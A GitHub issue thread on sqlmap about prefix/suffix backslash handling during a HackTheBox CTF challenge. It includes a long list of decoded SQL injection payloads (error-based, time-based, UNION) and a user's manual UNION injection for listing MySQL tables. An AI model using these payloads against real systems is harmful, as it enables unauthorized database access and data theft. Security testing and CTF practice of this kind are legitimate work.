### ISSUE TITLE
Prefix and Suffix not using a backslash

### ISSUE THREAD

**Issue by uBadRequest** [sqlmapproject/sqlmap#4211]
**Describe the bug**
The prefix and suffix is changing backslashes to  __BACKSLASH

**To Reproduce**
1. Run 'sqlmap -u 'http://docker.hackthebox.eu:30444/?obj=eyJJRCI6IjEifQo=' --base64=obj --prefix='{\"ID\":\"' --suffix='\"}' -v 5'
2. Decode base64 encoded parameter and you'll see the backslashes are changed to __BACKSLASH

**Expected behavior**
{"ID":"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 1)b#\"}"}
I wanted sqlmap to place payloads where "UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 1)b#" is and figured I could use prefixes to accomplish this.

**Screenshots**

**Running environment:**
 - sqlmap version [1.4.5.27#dev]
 - Installation method [git]
 - Operating system: [Debian Linux]
 - Python version [3.8.3]

**Target details:**
 - DBMS [MySQL]
 - SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind]
 - WAF/IPS [if any]
 - Relevant console output [if any]
 - Exception traceback [if any]

**Additional context**
Challenge EZPZ on hackthebox

**Comment by stamparm** [comment]
This is possible, though, I am not able to reproduce with command you provided:

Collected all URIs with:

`python sqlmap.py -u 'http://docker.hackthebox.eu:30444/?obj=eyJJRCI6IjEifQo=' --base64=obj --prefix='{"ID":"' --suffix='"}' -v 5 --batch | grep URI > /tmp/uri.txt`

Decoded payloads are (in unsorted manner):

```
{"ID": (SELECT (CASE WHEN (1781=6236) THEN '{"ID":"1"}
' ELSE (SELECT 6236 UNION SELECT 1724) END))"}{"ID": (SELECT (CASE WHEN (3359=3359) THEN '{"ID":"1"}
' ELSE (SELECT 7488 UNION SELECT 8645) END))"}{"ID": (SELECT 2819 FROM(SELECT COUNT(*),CONCAT(0x716a766271,(SELECT (ELT(2819=2819,1))),0x7176717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"}{"ID": (SELECT CONCAT(CONCAT('qjvbq',(CASE WHEN (4259=4259) THEN '1' ELSE '0' END)),'qvqpq'))"}{"ID":"1"}
{"ID":"1"}
{"ID":;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(117)||CHR(67)||CHR(112),[SLEEPTIME]) FROM DUAL"}{"ID":"1"}
{"ID":;SELECT PG_SLEEP([SLEEPTIME])"}{"ID":"1"}
{"ID":;WAITFOR DELAY '0:0:[SLEEPTIME]'"}{"ID":"1"}
{"ID": AND (SELECT 1028 FROM(SELECT COUNT(*),CONCAT(0x716a766271,(SELECT (ELT(1028=1028,1))),0x7176717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"}{"ID":"1"}
{"ID": AND (SELECT 9104 FROM (SELECT(SLEEP([SLEEPTIME])))aaXm)"}{"ID":"1"}
{"ID": AND 2578=2578"}{"ID":"1"}
{"ID": AND 3547=CAST((CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (3547=3547) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(113)||CHR(112)||CHR(113)) AS NUMERIC)"}{"ID":"1"}
{"ID": AND 3120=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (3120=3120) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(113)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)"}{"ID":"1"}
{"ID": AND 4698=9108"}{"ID":"1"}
{"ID": AND 5955=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(82)||CHR(114)||CHR(67),[SLEEPTIME])"}{"ID":"1"}
{"ID": AND 6707=(SELECT 6707 FROM PG_SLEEP([SLEEPTIME]))"}{"ID":"1"}
{"ID": AND 6791 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6791=6791) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(113)))"}{"ID":"1"}
{"ID": ORDER BY 1"}{"ID":"1"}
{"ID": WAITFOR DELAY '0:0:[SLEEPTIME]'"}{"ID":"1"}
{"ID":'((".,)(,,"}{"ID":"1"}
{"ID":'cObQiV<'">cLfAzb"}2610
```

**Comment by uBadRequest** [comment]
Sorry! Just realized I didn't place the prefix and suffix in a code box so it removed the backslash.
`--base64=obj --prefix='{\"ID\":\"' --suffix='\"}' -v 5`

Anyways I found another way to do this!

**Comment by uBadRequest** [comment]
`{"ID":"' UNION SELECT * from (SELECT 1)a JOIN (SELECT * from information_schema.tables)b#"}`

Kept saying... Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, bool given in /var/www/html/index.php on line 34

Had to do it manually.

**Comment by stamparm** [comment]
I patched it with the latest revision, though, I am not sure that you are doing this properly. That same error doesn't prove nor say anything more than that MySQL is not "spitting" anything useful as a result

**Comment by uBadRequest** [comment]
What I meant was the way you had to do the injection was include 1 as a mysqli_result, and then use mysql.innodb_index_stats instead of information_schema to get the tables/database name. Does sqlmap not use that method if you define the dbms as mysql?

**Comment by stamparm** [comment]
It uses both system tables for such retrieval (https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/queries.xml#L54-L57). You are now all of a sudden speaking about totally unrelated stuff
